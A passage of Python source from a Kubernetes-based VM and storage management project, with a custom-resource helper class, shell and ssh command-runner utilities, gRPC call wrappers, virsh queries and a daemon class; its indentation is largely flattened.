cfg = "/etc/kubevmm/config"
if not os.path.exists(cfg):
cfg = "/home/kubevmm/bin/config"
config_raw = parser()
config_raw.read(cfg)
prefix = config_raw.get('Kubernetes', 'hostname_prefix')
if prefix == 'vm':
return 'vm.%s' % socket.gethostname().lower()
else:
return socket.gethostname().lower()
def changeNode(jsondict, newNodeName):
if jsondict:
jsondict['metadata']['labels']['host'] = newNodeName
spec = get_spec(jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
spec['nodeName'] = newNodeName
return jsondict
def replaceData(jsondict):
all_kind = {'VirtualMachine': 'domain',
'VirtualMachinePool': 'pool',
'VirtualMachineDisk': 'volume',
'VirtualMachineDiskImage': 'volume',
'VirtualMachineDiskSnapshot': 'volume',
'VirtualMachineBackup': 'backup'}
mkind = jsondict['kind']
mn = jsondict['metadata']['name']
k8s = K8sHelper(mkind)
current = k8s.get(mn)
host = jsondict['metadata']['labels']['host']
# nodename = jsondicts[i]['metadata']['labels']['host']
changeNode(current, host)
if jsondict:
key = all_kind[mkind]
if 'spec' in list(jsondict.keys()) and isinstance(jsondict['spec'], dict) and key in list(jsondict['spec'].keys()):
data = jsondict['spec'][key]
if current:
current['spec'][key] = data
return current
def get_node_name(jsondict):
if jsondict:
return jsondict['metadata']['labels']['host']
return None
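# Thin wrapper around CustomObjectsApi for the kubevmm custom resources. Every call
# reloads the kube config and retries up to RETRY_TIMES times to ride out transient
# API-server failures.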
class K8sHelper(object):
def __init__(self, kind):
self.kind = kind
def exist(self, name):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=resources[self.kind]['group'],
version=resources[self.kind][
'version'],
namespace='default',
plural=resources[self.kind]['plural'],
name=name)
return True
except ApiException as e:
if e.reason == 'Not Found':
return False
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('K8sError', 'can not get %s %s response from k8s.' % (self.kind, name))
def get(self, name):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=resources[self.kind]['group'],
version=resources[self.kind][
'version'],
namespace='default',
plural=resources[self.kind]['plural'],
name=name)
return jsondict
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not get %s %s on k8s.' % (self.kind, name))
def get_data(self, name, key):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
jsondict = client.CustomObjectsApi().get_namespaced_custom_object(group=resources[self.kind]['group'],
version=resources[self.kind][
'version'],
namespace='default',
plural=resources[self.kind]['plural'],
name=name)
if 'spec' in list(jsondict.keys()) and isinstance(jsondict['spec'], dict) and key in list(jsondict['spec'].keys()):
return jsondict['spec'][key]
return None
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not get %s %s on k8s.' % (self.kind, name))
def get_create_jsondict(self, name, key, data):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
hostname = get_hostname_in_lower_case()
jsondict = {'spec': {'volume': {}, 'nodeName': hostname, 'status': {}},
'kind': self.kind, 'metadata': {'labels': {'host': hostname}, 'name': name},
'apiVersion': '%s/%s' % (resources[self.kind]['group'], resources[self.kind]['version'])}
jsondict = updateJsonRemoveLifecycle(jsondict, {key: data})
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
return body
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('k8sError', 'can not get %s %s data on k8s.' % (self.kind, name))
def create(self, name, key, data):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if self.exist(name):
return
hostname = get_hostname_in_lower_case()
jsondict = {'spec': {'volume': {}, 'nodeName': hostname, 'status': {}},
'kind': self.kind, 'metadata': {'labels': {'host': hostname}, 'name': name},
'apiVersion': '%s/%s' % (resources[self.kind]['group'], resources[self.kind]['version'])}
jsondict = updateJsonRemoveLifecycle(jsondict, {key: data})
body = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
return client.CustomObjectsApi().create_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], body=body)
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
error_print(500, 'can not create %s %s on k8s.' % (self.kind, name))
def add_label(self, name, domain):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if not self.exist(name):
return
jsondict = self.get(name)
jsondict['metadata']['labels']['domain'] = domain
# jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
# jsondict = updateJsonRemoveLifecycle(jsondict, {key: data})
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], name=name, body=jsondict)
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not modify %s %s on k8s.' % (self.kind, name))
def update(self, name, key, data):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if not self.exist(name):
return
jsondict = self.get(name)
                if 'spec' in list(jsondict.keys()) and isinstance(jsondict['spec'], dict) and key in list(jsondict['spec'].keys()) \
                        and operator.eq(jsondict['spec'][key], data):
                    return
jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
jsondict = updateJsonRemoveLifecycle(jsondict, {key: data})
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], name=name, body=jsondict)
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not modify %s %s on k8s.' % (self.kind, name))
def updateAll(self, name, jsondict):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if not self.exist(name):
return
jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
jsondict = deleteLifecycleInJson(jsondict)
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], name=name, body=jsondict)
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not modify %s %s on k8s.' % (self.kind, name))
def delete(self, name):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
k8s_logger.debug('deleteVMBackupdebug %s' % name)
return client.CustomObjectsApi().delete_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], name=name, body=V1DeleteOptions())
except ApiException as e:
if e.reason == 'Not Found':
return
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not delete %s %s on k8s.' % (self.kind, name))
def delete_lifecycle(self, name):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if not self.exist(name):
return
jsondict = self.get(name)
if hasLifeCycle(jsondict):
jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
jsondict = removeLifecycle(jsondict)
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'],
namespace='default',
plural=resources[self.kind]['plural'], name=name, body=jsondict)
else:
return
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not delete lifecycle %s %s on k8s.' % (self.kind, name))
def change_node(self, name, newNodeName):
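        # Re-home the resource: update its 'host' label and spec.nodeName, then push
        # the whole object with updateAll().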
if not self.exist(name):
return
jsondict = self.get(name)
if jsondict:
jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
jsondict['metadata']['labels']['host'] = newNodeName
spec = get_spec(jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
spec['nodeName'] = newNodeName
self.updateAll(name, jsondict)
def error_print(code, msg, data=None):
if data is None:
print(dumps({"result": {"code": code, "msg": msg}, "data": {}}))
exit(1)
else:
print(dumps({"result": {"code": code, "msg": msg}, "data": data}))
exit(1)
if __name__ == '__main__':
# data = {
# 'domain': 'cloudinit',
# 'pool': 'migratepoolnodepool22'
# }
backup_helper = K8sHelper('VirtualMachineBackup')
# backup_helper.create('backup1', 'backup', data)
print(backup_helper.add_label('vmbackup2', 'cloudinit'))
# print get_all_node_ip()
# get_pools_by_path('/var/lib/libvirt/cstor/1709accf174vccaced76b0dbfccdev/1709accf174vccaced76b0dbfccdev')
# k8s = K8sHelper('VirtualMachineDisk')
# disk1 = k8s.get('disk33333clone')
# print dumps(disk1)
# k8s.delete('disk33333clone1')
# k8s.create('disk33333clone1', 'volume', disk1['spec']['volume'])
# disk1['spec']['volume']['filename'] = 'lalalalalalala'
# k8s.update('disk33333clone1', 'volume', disk1['spec']['volume'])
```
#### File: kubeext-SDS-python3/utils/utils.py
```python
import atexit
import fcntl
import hashlib
import operator
import os
import re
import random
import signal
import socket
import string
import subprocess
import sys
import time
import traceback
import uuid
from functools import wraps
from json import loads, dumps, load, dump
from sys import exit
from xml.etree.ElementTree import fromstring
from xmljson import badgerfish as bf
import grpc
import xmltodict
import yaml
from kubernetes import client
from kubernetes.client.rest import ApiException
from .k8s import K8sHelper, addPowerStatusMessage, updateJsonRemoveLifecycle, get_hostname_in_lower_case, get_node_name, \
replaceData
from .arraylist import vmArray
from .ftp import FtpHelper
try:
import xml.etree.CElementTree as ET
except:
import xml.etree.ElementTree as ET
import cmdcall_pb2
import cmdcall_pb2_grpc
from . import logger
from .exception import ExecuteException
from netutils import get_docker0_IP
DEFARULT_MOUNT_DIR = '/var/lib/libvirt/cstor'
LOG = '/var/log/kubesds3.log'
logger = logger.set_logger(os.path.basename(__file__), LOG)
DEFAULT_PORT = '19999'
def runCmdWithResult(cmd):
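    # Run a shell command whose stdout is expected to be JSON; return the parsed
    # dict, appending any stderr output to the result message on a non-zero code,
    # and raise ExecuteException when the output cannot be parsed.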
if not cmd:
return
logger.debug(cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for index, line in enumerate(std_out):
line = line.decode("utf-8")
if not str.strip(line):
continue
msg = msg + str.strip(line)
msg = str.strip(msg)
logger.debug(msg)
try:
result = loads(msg)
if isinstance(result, dict) and 'result' in list(result.keys()):
if result['result']['code'] != 0:
if std_err:
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg).replace('"', "'")
result['result']['msg'] = '%s. error output: %s' % (
result['result']['msg'], error_msg)
return result
except Exception:
logger.debug(cmd)
logger.debug(traceback.format_exc())
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg)
raise ExecuteException('RunCmdError',
'can not parse output to json----%s. %s' % (msg, error_msg))
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
msg = msg + line + ', '
logger.debug(cmd)
logger.debug(msg)
logger.debug(traceback.format_exc())
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
finally:
p.stdout.close()
p.stderr.close()
def remoteRunCmdWithResult(ip, cmd):
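    # Same as runCmdWithResult, but the command is wrapped in 'ssh root@<ip> "..."'
    # so it runs on the remote host.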
if not cmd:
return
logger.debug(cmd)
cmd = 'ssh root@%s "%s"' % (ip, cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for index, line in enumerate(std_out):
line = line.decode("utf-8")
if not str.strip(line):
continue
msg = msg + str.strip(line)
msg = str.strip(msg)
logger.debug(msg)
try:
result = loads(msg)
if isinstance(result, dict) and 'result' in list(result.keys()):
if result['result']['code'] != 0:
if std_err:
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg).replace('"', "'")
result['result']['msg'] = '%s. error output: %s' % (
result['result']['msg'], error_msg)
return result
except Exception:
logger.debug(cmd)
logger.debug(traceback.format_exc())
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg)
raise ExecuteException('RunCmdError',
'can not parse output to json----%s. %s' % (msg, error_msg))
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
msg = msg + line + ', '
logger.debug(cmd)
logger.debug(msg)
logger.debug(traceback.format_exc())
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
finally:
p.stdout.close()
p.stderr.close()
def remoteRunCmdWithOutput(ip, cmd):
if not cmd:
return
logger.debug(cmd)
cmd = 'ssh root@%s "%s"' % (ip, cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for line in std_out:
line = line.decode("utf-8")
msg = msg + line
return msg
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
if index == len(std_err) - 1:
msg = msg + str.strip(line) + '. ' + '***More details in %s***' % LOG
else:
msg = msg + str.strip(line) + ', '
logger.debug(cmd)
logger.debug(msg)
logger.debug(traceback.format_exc())
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
finally:
p.stdout.close()
p.stderr.close()
def runCmdAndTransferXmlToJson(cmd):
xml_str = runCmdAndGetOutput(cmd)
dic = xmltodict.parse(xml_str, encoding='utf-8')
dic = dumps(dic)
dic = dic.replace('@', '').replace('#', '')
return loads(dic)
def runCmdAndSplitKvToJson(cmd):
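    # Parse 'Key: value' style output (e.g. 'virsh pool-info') into a dict with
    # lower-cased keys; lines that do not split into exactly two fields are skipped.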
logger.debug(cmd)
if not cmd:
# logger.debug('No CMD to execute.')
return
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
result = {}
for index, line in enumerate(std_out):
line = line.decode("utf-8")
if not str.strip(line):
continue
line = str.strip(line)
kv = line.replace(':', '').split()
if len(kv) == 2:
result[kv[0].lower()] = kv[1]
return result
if std_err:
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
else:
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg)
logger.debug(error_msg)
if error_msg.strip() != '':
raise ExecuteException('RunCmdError', error_msg)
finally:
p.stdout.close()
p.stderr.close()
def runCmdAndGetOutput(cmd):
if not cmd:
return
logger.debug(cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for line in std_out:
line = line.decode("utf-8")
msg = msg + line
return msg
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
if index == len(std_err) - 1:
msg = msg + str.strip(line) + '. ' + '***More details in %s***' % LOG
else:
msg = msg + str.strip(line) + ', '
logger.debug(cmd)
logger.debug(msg)
logger.debug(traceback.format_exc())
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
except Exception:
logger.debug(traceback.format_exc())
finally:
p.stdout.close()
p.stderr.close()
def remoteRunCmd(ip, cmd):
logger.debug(cmd)
if not cmd:
logger.debug('No CMD to execute.')
return
cmd = 'ssh root@%s "%s"' % (ip, cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
logger.debug(std_out)
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
msg = msg + line
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
return
finally:
p.stdout.close()
p.stderr.close()
'''
Run back-end command in subprocess.
'''
def runCmd(cmd):
logger.debug(cmd)
if not cmd:
# logger.debug('No CMD to execute.')
return
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
# msg = ''
# for index,line in enumerate(std_out):
# if not str.strip(line):
# continue
# if index == len(std_out) - 1:
# msg = msg + str.strip(line) + '. '
# else:
# msg = msg + str.strip(line) + ', '
# logger.debug(str.strip(msg))
logger.debug(std_out)
p.wait()
logger.debug('p.returncode: %d' % p.returncode)
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
msg = msg + line
logger.debug(msg)
if msg.strip() != '' and p.returncode != 0:
raise ExecuteException('RunCmdError', msg)
return
finally:
p.stdout.close()
p.stderr.close()
def runCmdRaiseException(cmd, head='VirtctlError', use_read=False):
logger.debug(cmd)
std_err = None
if not cmd:
return
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
if use_read:
std_out = p.stdout.read()
std_err = p.stderr.read()
else:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_err:
logger.debug(std_err)
raise ExecuteException(head, std_err)
return std_out
finally:
p.stdout.close()
p.stderr.close()
def rpcCall(cmd):
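    # Forward the command to the cmdcall gRPC service on the docker0 address and
    # raise ExecuteException when the call fails or returns a non-zero result code.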
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
response = client.Call(cmdcall_pb2.CallRequest(cmd=cmd))
logger.debug(response.json)
jsondict = loads(str(response.json))
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
        # Log the gRPC error details and status code before surfacing the failure.
        logger.debug(e.details())
        status_code = e.code()
        logger.debug(status_code.name)
        logger.debug(status_code.value)
        if grpc.StatusCode.INVALID_ARGUMENT == status_code:
            # Placeholder for status-specific handling.
            pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
if jsondict['result']['code'] != 0:
raise ExecuteException('RunCmdError', jsondict['result']['msg'])
return jsondict
def rpcCallWithResult(cmd):
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
        response = client.CallWithResult(cmdcall_pb2.CallRequest(cmd=cmd))
result = loads(str(response.json))
return result
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
        # Log the gRPC error details and status code before surfacing the failure.
        logger.debug(e.details())
        status_code = e.code()
        logger.debug(status_code.name)
        logger.debug(status_code.value)
        if grpc.StatusCode.INVALID_ARGUMENT == status_code:
            # Placeholder for status-specific handling.
            pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', 'can not parse rpc response to json.')
def rpcCallAndTransferXmlToJson(cmd):
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
        response = client.CallAndTransferXmlToJson(cmdcall_pb2.CallRequest(cmd=cmd))
result = loads(str(response.json))
return result
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
        # Log the gRPC error details and status code before surfacing the failure.
        logger.debug(e.details())
        status_code = e.code()
        logger.debug(status_code.name)
        logger.debug(status_code.value)
        if grpc.StatusCode.INVALID_ARGUMENT == status_code:
            # Placeholder for status-specific handling.
            pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', 'can not parse rpc response to json.')
def rpcCallAndTransferKvToJson(cmd):
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
        response = client.CallAndSplitKVToJson(cmdcall_pb2.CallRequest(cmd=cmd))
result = loads(str(response.json))
return result
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
        # Log the gRPC error details and status code before surfacing the failure.
        logger.debug(e.details())
        status_code = e.code()
        logger.debug(status_code.name)
        logger.debug(status_code.value)
        if grpc.StatusCode.INVALID_ARGUMENT == status_code:
            # Placeholder for status-specific handling.
            pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', 'can not parse rpc response to json.')
def rpcCallAndGetOutput(cmd):
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
        response = client.CallAndGetOutput(cmdcall_pb2.CallRequest(cmd=cmd))
result = loads(str(response.json))
if result['result']['code'] != 0:
raise ExecuteException('rpc call %s error' % cmd, result['result']['msg'])
return result['result']['msg']
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
        # Log the gRPC error details and status code before surfacing the failure.
        logger.debug(e.details())
        status_code = e.code()
        logger.debug(status_code.name)
        logger.debug(status_code.value)
        if grpc.StatusCode.INVALID_ARGUMENT == status_code:
            # Placeholder for status-specific handling.
            pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', 'can not parse rpc response to json.')
def randomUUID():
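    # Build a random version-4 UUID string from 16 random bytes.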
u = [random.randint(0, 255) for ignore in range(0, 16)]
u[6] = (u[6] & 0x0F) | (4 << 4)
u[8] = (u[8] & 0x3F) | (2 << 6)
return "-".join(["%02x" * 4, "%02x" * 2, "%02x" * 2, "%02x" * 2,
"%02x" * 6]) % tuple(u)
def randomUUIDFromName(name):
name = str(name)
namespace = uuid.NAMESPACE_URL
return str(uuid.uuid5(namespace, name))
def is_pool_started(pool):
poolInfo = runCmdAndSplitKvToJson('virsh pool-info %s' % pool)
if poolInfo['state'] == 'running':
return True
return False
def is_pool_exists(pool):
poolInfo = runCmdAndSplitKvToJson('virsh pool-info %s' % pool)
if poolInfo and pool == poolInfo['name']:
return True
return False
def is_pool_defined(pool):
poolInfo = runCmdAndSplitKvToJson('virsh pool-info %s' % pool)
if poolInfo['persistent'] == 'yes':
return True
return False
def is_vm_active(domain):
output = runCmdAndGetOutput('virsh list')
lines = output.splitlines()
for line in lines:
if domain in line.split():
return True
return False
def is_vm_exist(domain):
output = runCmdAndGetOutput('virsh list --all')
lines = output.splitlines()
for line in lines:
if domain in line.split():
return True
return False
def get_all_domain():
output = runCmdAndGetOutput('virsh list --all')
lines = output.splitlines()
domains = []
if len(lines) <= 2:
return domains
for i in range(2, len(lines)):
if len(lines[i].split()) < 3:
continue
domains.append(lines[i].split()[1])
return domains
def get_volume_size(pool, vol):
disk_config = get_disk_config(pool, vol)
disk_info = get_disk_info(disk_config['current'])
return int(disk_info['virtual_size'])
# def get_disks_spec(domain):
# if domain is None:
# raise ExecuteException('RunCmdError', 'domin is not set. Can not get domain disk spec.')
# output = runCmdAndGetOutput('virsh domblklist %s' % domain)
# lines = output.splitlines()
# spec = {}
# for i in range(2, len(lines)):
# kv = lines[i].split()
# if len(kv) == 2:
# spec[kv[1]] = kv[0]
# return spec
def get_disks_spec(domain):
if not domain:
raise ExecuteException('', 'missing parameter: no vm name(%s).' % domain)
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (domain, domain))
xmlfile = '/tmp/%s.xml' % domain
if xmlfile is None:
        raise ExecuteException('RunCmdError', 'domain xml file is not set. Can not get domain disk spec.')
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
spec = {}
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
target_element = disk.find("target")
spec[source_element.get("file")] = target_element.get('dev')
runCmd('rm -f %s' % xmlfile)
return spec
def get_disks_spec_by_xml(xmlfile):
if xmlfile is None:
        raise ExecuteException('RunCmdError', 'domain xml file is not set. Can not get domain disk spec.')
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
spec = {}
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
target_element = disk.find("target")
spec[source_element.get("file")] = target_element.get('dev')
return spec
def get_os_disk(domain):
if not domain:
raise ExecuteException('', 'missing parameter: no vm name(%s).' % domain)
uuid = randomUUID()
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (domain, uuid))
xmlfile = '/tmp/%s.xml' % uuid
if xmlfile is None:
        raise ExecuteException('RunCmdError', 'domain xml file is not set. Can not get domain disk spec.')
tree = ET.parse(xmlfile)
os_disk = {}
root = tree.getroot()
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
target_element = disk.find("target")
runCmd('rm -f %s' % xmlfile)
return target_element.get('dev'), source_element.get("file")
    raise ExecuteException('RunCmdError', 'cannot identify vm os disk.')
def get_os_disk_by_xml(xmlfile):
if xmlfile is None:
        raise ExecuteException('RunCmdError', 'domain xml file is not set. Can not get domain disk spec.')
tree = ET.parse(xmlfile)
os_disk = {}
root = tree.getroot()
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
target_element = disk.find("target")
return target_element.get('dev'), source_element.get("file")
    raise ExecuteException('RunCmdError', 'cannot identify vm os disk.')
class CDaemon:
'''
    A generic daemon class.
    Usage: subclass CDaemon and override the run() method.
    save_path: path of the pid file used to track the daemon process.
    stderr:    file that stderr is redirected to (defaults to os.devnull).
    verbose:   verbosity level; >= 1 prints start/stop messages.
'''
def __init__(self, save_path, stdin=os.devnull, stdout=os.devnull, stderr=os.devnull, home_dir='.', umask=0o22,
verbose=1):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = save_path
self.home_dir = home_dir
self.verbose = verbose
self.umask = umask
self.daemon_alive = True
def daemonize(self):
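        # Classic double-fork daemonization: detach from the controlling terminal,
        # redirect the standard streams and write the pid file.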
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #1 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
os.chdir(self.home_dir)
os.setsid()
os.umask(self.umask)
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #2 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
sys.stdout.flush()
sys.stderr.flush()
si = open(self.stdin, 'r')
so = open(self.stdout, 'a+')
if self.stderr:
            # Python 3 does not allow unbuffered text mode, so open stderr unbuffered in binary mode.
            se = open(self.stderr, 'ab+', 0)
else:
se = so
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
def sig_handler(signum, frame):
self.daemon_alive = False
signal.signal(signal.SIGTERM, sig_handler)
signal.signal(signal.SIGINT, sig_handler)
if self.verbose >= 1:
print('daemon process started ...')
atexit.register(self.del_pid)
pid = str(os.getpid())
open(self.pidfile, 'w+').write('%s\n' % pid)
def get_pid(self):
try:
pf = open(self.pidfile, 'r')
